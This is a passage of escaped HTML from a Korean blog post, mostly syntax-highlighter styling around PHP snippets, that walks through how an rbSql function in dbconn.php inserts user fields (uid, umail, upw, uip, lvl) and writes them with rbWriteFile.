class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbGetPath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a95006483986-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error4&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a95006483986-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a95006483986-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error5&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a95006483986-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a95006483986-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a95006483986-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;“insert” of rbSql function in dbconn.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;이후 uid, umail, upw, uip, lvl의 값을 insert 기능을 이용해 create에서 만든 서브테이블에 입력합니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;그럼 rbSql에서 값을 쓰고, 읽어오는 부분을 확인해봐야겠죠. 먼저 rbWriteFile부터 살펴봅시다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a99607844672&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a99607844672-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a99607844672-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a99607844672-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a99607844672-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a99607844672-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a99607844672-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; 